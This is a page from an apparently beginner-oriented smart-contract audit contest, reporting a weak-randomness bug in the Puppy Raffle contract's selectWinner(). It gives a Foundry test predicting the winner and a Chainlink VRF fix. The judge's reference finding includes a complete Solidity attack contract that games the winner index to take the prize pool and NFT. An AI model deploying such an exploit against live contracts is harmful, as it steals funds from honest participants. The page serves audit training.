Puppy Raffle

AI First Flight #1

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: high

Valid

Weak Randomness Allows Attacker to Predict and Guarantee Winning

sergios

Weak Randomness Allows Attacker to Predict and Guarantee Winning

Description

selectWinner() computes a winner index and NFT rarity using a hash of on-chain values to simulate randomness.
All inputs — msg.sender, block.timestamp, and block.difficulty — are known or controllable before the transaction executes. An attacker simulates the formula
off-chain and only calls selectWinner() when the result lands on their address.

// @> All three inputs are known or controllable before tx is mined

uint256 winnerIndex = uint256(keccak256(abi.encodePacked(

msg.sender, block.timestamp, block.difficulty

))) % players.length;

// @> Rarity uses same weak inputs — also predictable

uint256 rarity = uint256(keccak256(abi.encodePacked(

msg.sender, block.difficulty

))) % 100;

Risk

Likelihood:

Any caller can simulate the winner formula before submitting the transaction, calling only when guaranteed to win.
Post-Merge, block.difficulty is always 0, reducing entropy to only msg.sender and block.timestamp, making the output trivially predictable.

Impact:
- A single attacker wins every raffle round, stealing the prize pool from all honest participants.
- NFT rarity is also manipulable — the attacker guarantees a legendary NFT on every round.Proof of Concept

Proof of Concept

Because all inputs to the hash are known before the transaction is mined, an attacker can compute the winning index off-chain and only call selectWinner() when
their address wins. The following test proves the formula is fully deterministic and predictable before the transaction executes:

function test_WinnerPredictable() public {

address p0 = makeAddr("p0"); address p1 = makeAddr("p1");

address p2 = makeAddr("p2"); address p3 = makeAddr("p3");

address[] memory players = new address[](4);

players[0] = p0; players[1] = p1; players[2] = p2; players[3] = p3;

vm.deal(address(this), 4 ether);

raffle.enterRaffle{value: 4 ether}(players);

vm.warp(block.timestamp + duration + 1);

uint256 winnerIndex = uint256(

keccak256(abi.encodePacked(address(this), block.timestamp, block.difficulty))

) % 4;

address predicted = raffle.players(winnerIndex);

raffle.selectWinner();

assertEq(raffle.previousWinner(), predicted);

}

Recommended Mitigation

On-chain values should never be used as a source of randomness since they are observable and manipulable. Replace the current approach with Chainlink VRF, which
provides cryptographically verifiable randomness that cannot be predicted or influenced by any on-chain actor before it is revealed:

- uint256 winnerIndex = uint256(keccak256(abi.encodePacked(

- msg.sender, block.timestamp, block.difficulty

- ))) % players.length;

+ // Request randomness from Chainlink VRF

+ // Handle winner selection in fulfillRandomWords() callback

+ uint256 requestId = vrfCoordinator.requestRandomWords(

+ keyHash, subscriptionId, requestConfirmations, callbackGasLimit, numWords

+ );

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 4 hours ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-03] Randomness can be gamed

## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!